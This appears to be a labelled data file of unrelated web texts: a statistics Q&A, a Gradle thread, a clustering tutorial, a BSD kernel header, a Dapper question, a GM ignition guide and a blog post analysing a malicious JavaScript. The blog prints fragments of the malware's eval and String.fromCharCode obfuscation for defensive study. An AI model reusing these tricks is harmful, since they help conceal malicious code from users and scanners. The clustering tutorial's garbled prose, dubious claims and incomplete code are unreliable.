content
string
pred_label
string
pred_score
float64
4 $\begingroup$ Weighted least squares (WLS) and robust standard errors are sometimes presented as alternative approaches for obtaining reliable standard errors of estimates of regression coefficients in the presence of heteroscedasticity. However, I notice that my software (gretl) offers robust standard errors as an option when using WLS. A situation in which it seems this might be useful is where, in a regression of Y on X, there is a clear reason for heteroscedasticity, for example a scale effect such that larger values of Y are expected to be associated with larger variances. One might then use WLS, giving a higher weighting to observations with smaller Y (or, perhaps better, to observations with smaller E[Y | X], as inferred from an initial OLS regression). However, it might be found that the WLS residuals suggested some remaining heteroscedasticity that the weighting had not eliminated. This would suggest that the standard errors estimated by WLS might not be entirely reliable, and to address this one might opt for robust standard errors (rather than attempting to do so via some more complex weighting pattern). Question: Assuming the number of observations is reasonably large (over 100, say), are there any pitfalls in using WLS with robust standard errors when estimating standard errors of regression coefficients? $\endgroup$ • $\begingroup$ This answer math.stackexchange.com/questions/681332/robust-standard-errors/… , although dealing with robust standard errors in the OLS case, and not in the WLS case, it discusses why one should not use robust errors uncritically, and so perhaps it may be of some use to you. $\endgroup$ – Alecos Papadopoulos Mar 21 '14 at 2:30 • $\begingroup$ @AlecosPapadopoulos Thanks ... so applying this to WLS, it is important to test for any remaining heteroscedasticity, eg by examining the WLS residuals, rather than automatically opting for robust standard errors. $\endgroup$ – Adam Bailey Mar 21 '14 at 7:23 2 $\begingroup$ I break your concerns about the estimator into two areas: efficiency and asymptotic validity. I'll define a procedure as asymptotically valid if the point estimates are consistent, and the estimated variance-covariance is consistent. An extension of Alecos's arguments show, the robust (ie, sandwich) standard errors result in asymptotic validity, regardless of the assumed weighting matrix, and in fact this result even holds for clustered/correlated data (as long as independence holds on at the uppermost level of clustering). I'll define the efficiency of the estimate as the true asymptotic variance/covariance matrix of the coefficients. Of course, from Gauss-Markov we know that only when you select weights proportional to the inverse conditional variance of each observation will you achieve the best limiting unbiased limit.$^1$ So based on first order, asymptotic concerns, we may just take the best stab at estimating the weightings we can, then go ahead and just robust standard errors to guard against mistakes in the weights. To say anything more refined then this we need to think of second-order asymptotic or finite sample concerns. An example of a second order concern might be "variance of the variance." While I don't have the inclination to try to make Aleco's argument rigorous, I believe it does hold--that when you estimate additional, unnecessary parameters you will introduce additional variance in the remaining parameters. (You might be able to make it rigorous by considering schur decompositions of blocks of the information matrix?) So there is probably a second-order bias-variance tradeoff present: when you use the robust standard errors, you eliminate bias in the standard errors, at the cost of maybe more variance in them. Most people seem to care more about the bias than the variance, but if this tradeoff is important, then the only advice I have to offer is to simulate or bootstrap see how much it might matter in your application. There's probably some additional theory extant or to be developed that could offer some advice by using higher-order asymptotics, but that's beyond my paygrade. $^1$ Proof here, apparently originally due to Aitchen. $\endgroup$ Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.845428
About Me My photo Bay Area, CA, United States I'm a computer security professional, most interested in cybercrime and computer forensics. I'm also on Twitter @bond_alexander All opinions are my own unless explicitly stated. Wednesday, April 6, 2011 Reverse engineering a malicious javascript part 1 My antivirus program flagged a malicious javascript a few days ago. At some point in my web browsing, a webpage quietly served up a malicious script in addition to the regular content. It was saved to my browser's cache and quarantined by my antivirus. Being the curious person that I am, I thought I'd try my hand at understanding how it works. Of course, as is typical of malicious scripts it was obfuscated.  Instead of looking like nice Javascript: <script type="text/javascript"> document.write("<h1>This is a heading</h1>"); document.write("<p>This is a paragraph.</p>"); document.write("<p>This is another paragraph.</p>"); </script> the malicious script is a mess, deliberately difficult to read (click to enlarge): The sequence of numbers keeps going for the rest of the script. Malware authors use tricks like this to keep people like me from understanding how the script works, and to make it more difficult for antivirus software to detect the page. If the av can't penetrate the obfuscation, then if they start detecting this page all the malware author needs to do is obfuscate it differently to generate a new signature. For more information on reverse engineering malware, take a look at this BlackHat presentation (pdf). The curious thing about obfuscation is that it's designed to be difficult for people to understand yet simple for computers to understand. Luckily for me, that means we can use a javascript engine to translate it all back for us. Didier Stevens has modified Mozilla's Spidermonkey for exactly this purpose. All I need to to is extract the javascript from the rest of the page so I can feed it to the engine. Since this is pretty simple, though, I'm going to do this by hand. Since the code has no line breaks or anything else useful, I fed it into Eclipse to clean it up and grab the javascript. Cleaning it up in Eclipse makes the initial part of the script make a lot more sense. Take a look (click to enlarge): If you know a little Javascript, you can already get an idea of what's going on. We've got a hidden textarea with some text in it. Right now it's meaningless, but this is going to be modified by the Javascript to pull the script together. The applet section makes a reference to a Java applet that would've been housed on the same webserver as this malicious webpage. Since I found this file in my cache, the applet isn't available for me to examine. Right now it's the content in the script tags that we're going to look at. This is the part of the script that pulls together all the obfuscated components of the script and tells the browser how to execute them to infect itself with whatever piece of badness the author wants to hit me with. Let's work through this step by step. var date = new Date(); var f = date.getFullYear()-2009; First, the script gets the date, pulls the year out, subtracts 2009, and saves it to the variable f. This limits the script to only this year, but the lifetime of an attack like this measures in days at the most so that's not a significant limitation. All this is a complicated way of defining f=2. Next, we have: zni = '2011val'.replace(date.getFullYear(),''); var e = new Function('axlzg','return e'+zni)(); zni is another variable. Here, we take the string '2011val' and then delete the current year, so zni = val Then, we define a function, e. e produces a string 'axlzg' and also takes the string 'return e' and appends the value of zni. This computes to return eval, which is a Javascript command to evaluate a string as if it was code. Moving on: xzjc=document.getElementById('textarea').value; var content = ''; There's another uninformatively-named variable here, but it's pretty obvious what it does. xzjc grabs the content of the text area, so xzjc = 'tring.from2011har2011ode' The script also defines a variable 'content', which is a blank string. We're getting somewhere now! var fnxes=e('S'+xzjc.split(date.getFullYear()).join('C')); This one's a little more complicated. This one's another text-manipulation exercise that will further translate things. Like math, we need to start from inside the parentheses and work outwards. First, we're taking xzjc from the last line. We put 'S' in front and then split it into separate strings using the current year as the split point, yielding 'String.from' 'har' 'ode'. Then we re-join the fragments using a "separator" of 'C'. Now we have 'String.fromCharCode', which is a Javascript function that takes encoded characters and decodes them to a string. This result is run through the function "e", which takes the string and converts it back to code, so it can execute. The reason the author is bothering with all this is because String.fromCharCode() is a common function that takes a set of character codes (in this case numbers) and converts them back to letters. For example, "51*f" is 51*2 = 102, which is the Unicode character code for f. Malware authors often use to obfuscate their code (as we'll soon see) so, it's a indicator that antivirus companies will trigger on. In this script, the malware author has to obfuscate their obfuscation method in order to try and evade the antivirus signature. I found this script because it triggered my antivirus, so even all this obfuscation failed. Let's look at the last couple lines of this script. content = fnxes(51*f,58.5*f,55*f,49.5*f,58*f,52.5*f,55.5*f, 55*f,16*f,50.5*f,55*f,50*f,47.5*f,57*f,50.5*f,50*f,52.5*f, 57*f,50.5*f,49.5*f,58*f,20*f,20.5*f,61.5*f,62.5*f,29.5*f, 50*f,........ ); e(content); There's actually a lot more numbers in there than I'm showing, I'm just cropping it out for simplicity's sake. The script is taking the variable "content" and actually defining it. It's taking each of these numbers and multiplying it by f, which we already learned was 2. Then, it's running fnxes (which is really String.fromCharCode) against it. Now I'm going to turn to Spidermonkey to translate all this crap into real code, it would just be too annoying to do by hand. So, after we multiply the numbers by 2 and then turn them back into a string, we get the payload. Unfortunately the payload itself is pretty long and complicated, so that'll have to wait for part 2 so I can have time to figure out what's going on. No comments: Post a Comment
__label__pos
0.849609
Snapshot dependencies with sources/test classifier are not updated We publish source and test code jars for common libraries to Nexus. So we end up with something like: core-1.0-SNAPSHOT.jar core-1.0-SNAPSHOT-sources.jar core-1.0-SNAPSHOT-test.jar Then I refer to the test jar from another project like so: testCompile group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test' This works the first time it is run but the updates do not get downloaded. So I have the usual: configurations.all { resolutionStrategy { //don't cache snapshots cacheChangingModulesFor 0, 'seconds' } } This works for the main artifact but not for the test jar. What can I do to get the test jar to update like a normal SNAPSHOT? Cheers, Ben Hi Ben, What Gradle version? And what’s the repository definition that this dependency will be coming from? Gradle version M8a The repository is a Nexus Maven repo. I meant to mention that if I run --refresh dependencies, then that brings down the latest test jar. So it is possible, but I’d prefer it to work like a standard changing dependency. I just noticed that the version in: group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test' Doesn’t look right. Is that a copy/paste error? sorry yes that’s a typo As I say - it works OK first time (i.e. nothing in local cache), and if I do --refresh dependencies. I suspect it is using the default caching resolution strategy rather than the zero seconds one I have specified. I’ll try to see today if I get a new version down after 24hrs. A bit more detail in case it is useful we create the test code jar like so: task testsJar(type: Jar, dependsOn: testClasses) { classifier = 'tests' from sourceSets.test.output.classesDir } and publish to nexus by adding it to the artifacts like so: artifacts { archives sourcesJar archives testsJar } FWIW we also seem to have the same problem with the sources jar. Linked to GRADLE-2175. Can you try declaring your dependency like: testCompile group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test', changing: true I suspect that we’re not automatically flagging 1.0-SNAPSHOT-test.jar as ‘changing’. Hi Daz yes I have tried this but it didn’t seem to help. I’ll have another go when I get a chance and let you know. OK I can confirm that using ‘changing: true’ does not solve the problem. Thanks, Ben We had to publish sources inside the main jar and remove publishing of sources artifacts in order to avoid troublesome desynchronization on the IDE side… otherwise people would see old sources whilst using updated binaries. This is still an issue. Anyone figured out how to fix this? Thanks
__label__pos
0.621788
Software DevelopmentFundamentals Of Unsupervised Learning with Python Fundamentals Of Unsupervised Learning with Python Unsupervised Learning is a part of machine learning and mostly intake with AI. In layman language, unsupervised is a machine learning from unsettled and unlabeled data, without supervision and patterned structured based on predictions only. With all these factors one can say that, unsupervised learning consists of a variety of techniques from clustering to factorization and density estimation. Here we will look at its fundamentals, matrix and implementation of algorithms. To understand this concept in detail, let’s have a look on its factor one by one! To understand unsupervised learning, let’s first look at its building blocks like clustering, prediction and label! Clustering: It is a basic phenomena of data structuring and classifying. In plain words clustering is a collection and group making of data on behalf of their similarities and dissimilarities. It’s more like dividing and manufacturing data in subsets, known as clusters, and after this, these clusters than use as data processing. Below is one simple reference for a cluster description. Table So, how exactly the predictions have been made in unsupervised process. • First of all, an input has been given to the machine. • Then an input check respective cluster. • If a cluster met with an input, then the prediction being made, otherwise crashed. K – Means and Mean shift algorithms are the main fundamentals used to make clusters. Let’s have a keen look at both. K- means algorithm is one of the renowned criteria for cluster data, and to do this we have to assume the flat number of clusters to determine the object, which is why this terminology is called as flat clustering. The below steps are qualified enough to investigate about flat clustering. • Set desire number of K subgroups. • Now fix a number of clusters and classify each data with a cluster.This is an iterative algorithm, so we need to update the location until and unless the centroid react at its optimal location. To understand in deeper, we have an example below. import matplotlib.pyplot as plt import seaborn as sns; sns.set() import numpy as np from sklearn.cluster import KMeans The below code can be used to generate a two dimensional database. from sklearn.datasets.samples_generator import make_blobs X, y_true = make_blobs(n_samples = 500, centers = 4, cluster_std = 0.40, random_state = 0) Use below code to visualize the dataset. plt.scatter(X[:, 0], X[:, 1], s = 50); plt.show() Now initializing the K-means to be the K-Means algorithm, the required parameter to set like how many clusters (n_clusters). kmeans = KMeans(n_clusters = 4) Mean Shift Algorithm: It is also an another powerful algorithm to set cluster, but unlike than K-means, mean shift algorithm doesn’t work on assumptions, because of its non-parametric nature. Below are the basic steps to initialize the mean shift algorithm. • Firstly, go with the data pointer assignment to their own cluster. • With this it will compute the centroid and will assign new location, with this process it will move towards higher density of the cluster. • Once the peak of density has been achieved, then the stage will come, where the centroid will not move anymore. Now about the coding part! With the following code one can implement mean shift clustering algorithm in python. import numpy as np from sklearn.cluster import MeanShift import matplotlib.pyplot as plt from matplotlib import style style.use("ggplot") make_blob from the sklearn.dataset will help in generating the two-dimensional dataset with four blobs. from sklearn.datasets.samples_generator import make_blobs Now to visualise the actual generated code, use the following code: centers = [[2,2],[4,5],[3,10]] X, _ = make_blobs(n_samples = 500, centers = centers, cluster_std = 1) plt.scatter(X[:,0],X[:,1]) plt.show() Hierarchical Clustering Hierarchical clustering is an another mean of clustering, to create a hierarchy of clusters. It works with the assigned data on each set and make groups with most closest groups. This algorithm ends when only a single cluster left. There are two main types of hierarchy clustering to expand data, which are Agglomerative and Divisive. Agglomerative; also known as bottom-up approach. With this criteria each cluster merges in a way to form linkage criterion, and this hierarchy come in a form when, clusters of interest made of only few linked observations. It is much applicable for large clusters and more effective than K-means. Divisive: Divisive and also known a top-to down! In this all moves come from one cluster, and splits one moves down. This process is relatively slower than agglomerative and K-means. Now let’s have a look at one example of hierarchy clustering with very simple data: In [4] # generate the linkage matrix Z = linkage(X, ‘ward’) In [5] from scipy.cluster.hierarchy import cophenet from scipy.spatial.distance import pdist c, coph_dists = cophenet(Z, pdist(X)) c Out: 0.98001483875742679 With these very simple and easy to navigate examples, one can understand a very firm role of data, cluster, prediction and inputs. All these examples can be perform on relevant platform with python installation. LEAVE A REPLY Please enter your comment! Please enter your name here Exclusive content - Advertisement - Latest article 21,501FansLike 4,223FollowersFollow 103,000SubscribersSubscribe More article - Advertisement -Eduonix Blog
__label__pos
0.927111
Uploaded image for project: 'JDK' 1. JDK 2. JDK-8125336 Cannot style Choicebox Dropdown XMLWordPrintable Details • Bug • Status: Resolved • P4 • Resolution: Cannot Reproduce • fx2.0.2 • 8 • javafx • Windows 7, Windows XP, netbeans 7.2 and 7.3, Scenebuilder 1.0 and 1.1.1 Description I am trying to change the background color and hover color of the drop down menu that appears in a choice box. when I preview the attached code in SceneBuilder, the style is applied properly: the drop down has a red background and the hover over color is salmon. The other rules are applied as well. If I compile the code and run it, the dropdown appears in default grey and the hover over in default blue. The .context-menu and #choice-box-menu-item:hover css selector rules are not being applied in compiled code. Attachments 1. SampleController.java 0.7 kB 2. Sample.fxml 1.0 kB 3. Sample.fxml 0.9 kB 4. sample.css 0.7 kB 5. JavaFXApplication.java 1 kB 6. fromScenebuilder.png fromScenebuilder.png 6 kB 7. Compiled.png Compiled.png 7 kB Activity People psomashe Parvathi Somashekar (Inactive) ethompsonjfx Edward Thompson (Inactive) Votes: 0 Vote for this issue Watchers: 2 Start watching this issue Dates Created: Updated: Resolved: Imported:
__label__pos
0.901425
File:  [DragonFly] / src / sys / net / netisr.h Revision 1.9: download - view: text, annotated - select for diffs Sat Mar 6 19:40:30 2004 UTC (11 years, 2 months ago) by dillon Branches: MAIN CVS tags: HEAD Simplify LWKT message initialization semantics to reduce API confusion. Cleanup netisr messaging to provide more uniform error handling and to use lwkt_replymsg() unconditionally for both async/auto-free and sync messages as the abstraction intended. This also fixes a reply/free race. 1: /* 2: * Copyright (c) 1980, 1986, 1989, 1993 3: * The Regents of the University of California. All rights reserved. 4: * 5: * Redistribution and use in source and binary forms, with or without 6: * modification, are permitted provided that the following conditions 7: * are met: 8: * 1. Redistributions of source code must retain the above copyright 9: * notice, this list of conditions and the following disclaimer. 10: * 2. Redistributions in binary form must reproduce the above copyright 11: * notice, this list of conditions and the following disclaimer in the 12: * documentation and/or other materials provided with the distribution. 13: * 3. All advertising materials mentioning features or use of this software 14: * must display the following acknowledgement: 15: * This product includes software developed by the University of 16: * California, Berkeley and its contributors. 17: * 4. Neither the name of the University nor the names of its contributors 18: * may be used to endorse or promote products derived from this software 19: * without specific prior written permission. 20: * 21: * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 22: * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23: * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 24: * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 25: * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26: * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 27: * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 28: * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 29: * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 30: * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 31: * SUCH DAMAGE. 32: * 33: * @(#)netisr.h 8.1 (Berkeley) 6/10/93 34: * $FreeBSD: src/sys/net/netisr.h,v 1.21.2.5 2002/02/09 23:02:39 luigi Exp $ 35: * $DragonFly: src/sys/net/netisr.h,v 1.9 2004/03/06 19:40:30 dillon Exp $ 36: */ 37: 38: #ifndef _NET_NETISR_H_ 39: #define _NET_NETISR_H_ 40: 41: #include <sys/msgport.h> 42: 43: /* 44: * The networking code runs off software interrupts. 45: * 46: * You can switch into the network by doing splnet() and return by splx(). 47: * The software interrupt level for the network is higher than the software 48: * level for the clock (so you can enter the network in routines called 49: * at timeout time). 50: */ 51: 52: /* 53: * Each ``pup-level-1'' input queue has a bit in a ``netisr'' status 54: * word which is used to de-multiplex a single software 55: * interrupt used for scheduling the network code to calls 56: * on the lowest level routine of each protocol. 57: */ 58: #define NETISR_RESERVED0 0 /* cannot be used */ 59: #define NETISR_POLL 1 /* polling callback */ 60: #define NETISR_IP 2 /* same as AF_INET */ 61: #define NETISR_NS 6 /* same as AF_NS */ 62: #define NETISR_AARP 15 /* Appletalk ARP */ 63: #define NETISR_ATALK2 16 /* Appletalk phase 2 */ 64: #define NETISR_ATALK1 17 /* Appletalk phase 1 */ 65: #define NETISR_ARP 18 /* same as AF_LINK */ 66: #define NETISR_IPX 23 /* same as AF_IPX */ 67: #define NETISR_USB 25 /* USB soft interrupt */ 68: #define NETISR_PPP 27 /* PPP soft interrupt */ 69: #define NETISR_IPV6 28 /* same as AF_INET6 */ 70: #define NETISR_NATM 29 /* same as AF_NATM */ 71: #define NETISR_NETGRAPH 30 /* same as AF_NETGRAPH */ 72: #define NETISR_POLLMORE 31 /* check if we need more polling */ 73: 74: #define NETISR_MAX 32 75: 76: #ifdef _KERNEL 77: 78: #include <sys/protosw.h> 79: 80: struct netmsg; 81: 82: typedef int (*netisr_fn_t)(struct netmsg *); 83: 84: /* 85: * Base class. All net messages must start with the same fields. 86: */ 87: struct netmsg { 88: struct lwkt_msg nm_lmsg; 89: netisr_fn_t nm_handler; 90: }; 91: 92: struct netmsg_packet { 93: struct lwkt_msg nm_lmsg; 94: netisr_fn_t nm_handler; 95: struct mbuf *nm_packet; 96: }; 97: 98: struct netmsg_pr_ctloutput { 99: struct lwkt_msg nm_lmsg; 100: netisr_fn_t nm_handler; 101: int (*nm_prfn) (struct socket *, struct sockopt *); 102: struct socket *nm_so; 103: struct sockopt *nm_sopt; 104: }; 105: 106: struct netmsg_pr_timeout { 107: struct lwkt_msg nm_lmsg; 108: netisr_fn_t nm_handler; 109: void (*nm_prfn) (void); 110: }; 111: 112: /* 113: * for dispatching pr_ functions, 114: * until they can be converted to message-passing 115: */ 116: int netmsg_pr_dispatcher(struct netmsg *); 117: 118: #define CMD_NETMSG_NEWPKT (MSG_CMD_NETMSG | 0x0001) 119: #define CMD_NETMSG_POLL (MSG_CMD_NETMSG | 0x0002) 120: 121: #define CMD_NETMSG_PRU_ABORT (MSG_CMD_NETMSG | 0x0003) 122: #define CMD_NETMSG_PRU_ACCEPT (MSG_CMD_NETMSG | 0x0004) 123: #define CMD_NETMSG_PRU_ATTACH (MSG_CMD_NETMSG | 0x0005) 124: #define CMD_NETMSG_PRU_BIND (MSG_CMD_NETMSG | 0x0006) 125: #define CMD_NETMSG_PRU_CONNECT (MSG_CMD_NETMSG | 0x0007) 126: #define CMD_NETMSG_PRU_CONNECT2 (MSG_CMD_NETMSG | 0x0008) 127: #define CMD_NETMSG_PRU_CONTROL (MSG_CMD_NETMSG | 0x0009) 128: #define CMD_NETMSG_PRU_DETACH (MSG_CMD_NETMSG | 0x000a) 129: #define CMD_NETMSG_PRU_DISCONNECT (MSG_CMD_NETMSG | 0x000b) 130: #define CMD_NETMSG_PRU_LISTEN (MSG_CMD_NETMSG | 0x000c) 131: #define CMD_NETMSG_PRU_PEERADDR (MSG_CMD_NETMSG | 0x000d) 132: #define CMD_NETMSG_PRU_RCVD (MSG_CMD_NETMSG | 0x000e) 133: #define CMD_NETMSG_PRU_RCVOOB (MSG_CMD_NETMSG | 0x000f) 134: #define CMD_NETMSG_PRU_SEND (MSG_CMD_NETMSG | 0x0010) 135: #define CMD_NETMSG_PRU_SENSE (MSG_CMD_NETMSG | 0x0011) 136: #define CMD_NETMSG_PRU_SHUTDOWN (MSG_CMD_NETMSG | 0x0012) 137: #define CMD_NETMSG_PRU_SOCKADDR (MSG_CMD_NETMSG | 0x0013) 138: #define CMD_NETMSG_PRU_SOSEND (MSG_CMD_NETMSG | 0x0014) 139: #define CMD_NETMSG_PRU_SORECEIVE (MSG_CMD_NETMSG | 0x0015) 140: #define CMD_NETMSG_PRU_SOPOLL (MSG_CMD_NETMSG | 0x0016) 141: 142: #define CMD_NETMSG_PR_CTLOUTPUT (MSG_CMD_NETMSG | 0x0017) 143: #define CMD_NETMSG_PR_TIMEOUT (MSG_CMD_NETMSG | 0x0018) 144: 145: typedef lwkt_port_t (*lwkt_portfn_t)(struct mbuf *); 146: 147: struct netisr { 148: lwkt_port ni_port; /* must be first */ 149: lwkt_portfn_t ni_mport; 150: netisr_fn_t ni_handler; 151: }; 152: 153: lwkt_port_t cpu0_portfn(struct mbuf *m); 154: void netisr_dispatch(int, struct mbuf *); 155: int netisr_queue(int, struct mbuf *); 156: void netisr_register(int, lwkt_portfn_t, netisr_fn_t); 157: int netisr_unregister(int); 158: void netmsg_service_loop(void *arg); 159: void schednetisr(int); 160: 161: #endif /* KERNEL */ 162: 163: #endif /* _NET_NETISR_H_ */
__label__pos
0.989295
5 I am trying to save a model to the database using Dapper. I set up the parameters with an input/output parameter that is an int with an existing primary key value used for an update. public async Task<TKey> SaveAsync<TKey>(IGraph builder, IDataContext context = null) { var parameters = this.GetParametersFromDefinition(builder, DefinitionDirection.In); // See if we have a key defined. If not, we assume this is a new insert. // Otherwise we pull the key out and assume it's an update. PropertyDefinition key = builder.GetKey(); if (key != null) { parameters.Add(key.ResolvedName, key.PropertyValue, null, ParameterDirection.InputOutput); } else { throw new InvalidOperationException("The data graph did not have a primary key defined for it."); } await this.ExecuteProcedure(parameters, builder, context); object returnedId = parameters.Get<TKey>(key.ResolvedName); return returnedId == null ? default(TKey) : (TKey)returnedId; } private Task ExecuteProcedure(DynamicParameters parameters, IGraph builder, IDataContext context = null) { ProcedureDefinition mapping = builder.GetProcedureForOperation(ProcedureOperationType.Insert); if (string.IsNullOrEmpty(mapping.StoredProcedure)) { throw new InvalidOperationException("No stored procedure mapped to the builder."); } // Query the database return this.SetupConnection( context, (connection, transaction) => connection.ExecuteAsync( mapping.StoredProcedure, parameters, commandType: CommandType.StoredProcedure, transaction: transaction)); } It is invoked like this: this.Address.AddressId = await repository.SaveAsync<int>(graph); When I evaluate the parameters, I see my input/output parameters on it. Dynamic Parameters However when I try to execute this line in my save: TKey returnedId = parameters.Get<TKey>(key.ResolvedName); I am given the following exception: Exception:Caught: "Attempting to cast a DBNull to a non nullable type! Note that out/return parameters will not have updated values until the data stream completes (after the 'foreach' for Query(..., buffered: false), or after the GridReader has been disposed for QueryMultiple)" (System.ApplicationException) A System.ApplicationException was caught: "Attempting to cast a DBNull to a non nullable type! Note that out/return parameters will not have updated values until the data stream completes (after the 'foreach' for Query(..., buffered: false), or after the GridReader has been disposed for QueryMultiple)" Time: 7/21/2015 10:19:48 PM Thread:[7200] I am assuming this is an issue with the generic type not being nullable in this case, as it's an integer. Is this because Dapper always returns a nullable? I've just assigned the OUTPUT on the stored procedure a constant value for now to make sure the output is assigned something. How can I work around dapper returning a nullable, is the only way around it my passing in int? as the generic type? Update I was able to resolve it using this approach. SO won't let me post it as an answer yet. When the time limit is up, I'll post an answer, unless someone else has any better ideas. object returnedId = parameters.Get<TKey>(key.ResolvedName); if (returnedId == null) { return default(TKey); } return (TKey)returnedId; 1 If DBNull is a valid value and should mean something other than default(TKey) (ex: default(int) = 0), and if TKey will always be a value type, then constrain TKey as struct like so: public async Task<TKey?> SaveAsync<TKey>(IGraph builder, IDataContext context = null) where TKey : struct { ... } Then get the key like so: TKey? returnedId = parameters.Get<TKey?>(key.ResolvedName); The return type of SaveAsync will reflect that the key could be null. If the key should never be null, and if DBNull should be defaulted to default(TKey), then simply use the following: public async Task<TKey?> SaveAsync<TKey>(IGraph builder, IDataContext context = null) where TKey : struct { ... return parameters.Get<TKey?>(key.ResolvedName).GetValueOrDefault(); } | improve this answer | | Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.985682
How To Test The GM Distributor Mounted Ignition Module The GM distributor mounted ignition control module (ICM), can be tested on the car or truck easily. Not only that, you don't need any expensive tools to do it. Now, AutoZone can test it for you (if you remove it and take it to them), but for those of you that can't afford the time this involves or for those who want to add another diagnostic technique to their ‘toolbox’ of know-how, this article is for you. This article will walk you step by step thru' the testing and diagnostic of a MISFIRE or NO START Condition. You'll test the following components: ignition control module, spark plug wires, distributor cap and rotor and ignition coil and pick up coil of the GM 4.3L, 5.0L, 5.7L and 7.4L distributor type ignition system. Before we start, just want to remind you that since this is an On Car test, do not remove the ignition control module from the distributor or the ignition coil. Some of the images in this article show them off of the vehicle just to make it easier to explain their testing process. The following tutorials will also help you: 1. How To Test The ‘Spider’ Fuel Injector Assembly (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 2. How To Diagnose Misfire Codes (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 3. GM Engine Compression Test (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 4. How To Test A Misfire / No Spark-No Start Condition (4.3L, 5.0L, 5.7L 96-04). You can find this tutorial in Spanish here: Cómo Probar El Sistema de Encendido (GM 4.3L, 5.0L, 5.7L) (at: autotecnico-online.com). If you need to test the 7 pin (older) ignition module, the following tutorial will help: How To Test The Ignition Control Module (2.8L V6 GM). The typical ignition system circuit diagram for the 1992-1995 4.3L, 5.0L, and 5.7L 1500, 2500, 3500 Pick Up and Suburban can be found here: Ignition System Circuit Diagram (1992-1995 Chevy/GMC Pick Up And SUV). Basic Operating Theory Here is a little background information (and I stress ‘little’) explained in plain english, to help you diagnose this NO START/NO SPARK Condition of the distributor. In a nutshell, when you crank up the engine (and the system is working properly): 1. The distributor shaft starts to rotate, inducing the pick up coil to start generating its magnetic signal. 2. This pick up coil signal is sent directly to the ignition control module. 3. The ignition module, upon receiving this pick up coil signal (for all intended purposes it's a Crankshaft Position Sensor signal) converts it to a digital signal that is now sent to the fuel injection computer. This digital signal is called the: Distributor Reference Hi Signal in the majority of the service literature. 4. Also, after receiving the pick up coil signal, the ignition control module starts to switch the Primary Current (of the ignition coil) On and Off. As you might already know, it's this ‘Switching Signal’ that makes the ignition coil start sparking away. 5. OK, once the fuel injection computer receives the Reference Hi Signal, it starts activating the fuel injectors and above 400 RPM, starts to send a 5 V Bypass Signal to the ignition control module. It's with the Bypass Signal that the computer starts to retard and advance ignition timing with the IC Signal. 6. So, then above 400 RPM (any RPM above this and the ECM considers the engine as having started) the fuel injection computer starts to control the ignition timing. The tests that you're gonna' learn in this article only deal with steps 1 thru' 4, among several tests. But whether your car or truck DOES NOT START or STARTS but runs with a MISFIRE, this is the article for you! Symptoms Of A Bad Ignition Control Module The following are usually the most common symptoms of a bad ignition control module on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) will Crank but NO START. 2. No spark coming from any of the spark plug wires. 3. The Throttle Body Fuel Injectors do not spray gasoline. The following are usually the most common symptoms of a bad spark plug wires, or a bad distributor cap and rotor on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) STARTS and RUNS, but with a misfire. 2. The check engine light is on. 3. Lack of power. 4. Rough idle. 5. Bad gas mileage. 6. Rotten egg smell coming out of the tailpipe. 7. Black smoke coming out of the tailpipe. 8. Won't pass the mandatory state emissions' test. The following is usually the most common (and only) symptom of a bad ignition coil on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) CRANKS but does NOT START. Chevrolet Vehicles: • Astro 4.3L • 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Blazer 4.3L, 5.0L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Silverado C1500, C2500, C3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 Chevrolet Vehicles: • Suburban C1500, C2500, C3500 5.7L, 7.4L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Camaro 2.8L, 3.1L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992 • Caprice Classic 4.3L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993 Chevrolet Vehicles: • Cavalier 2.0L, 2.8L • 1985, 1986 • Celebrity 2.0L, 2.8L • 1985, 1986 • El Camino 4.3L, 5.0L • 1985, 1986, 1987 • G10 G20 G30 Van 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • Sierra, Suburban C1500, C2500, C3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • G1500, G2500, G3500 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Jimmy 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • K1500, K2500, K3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • S15 Jimmy 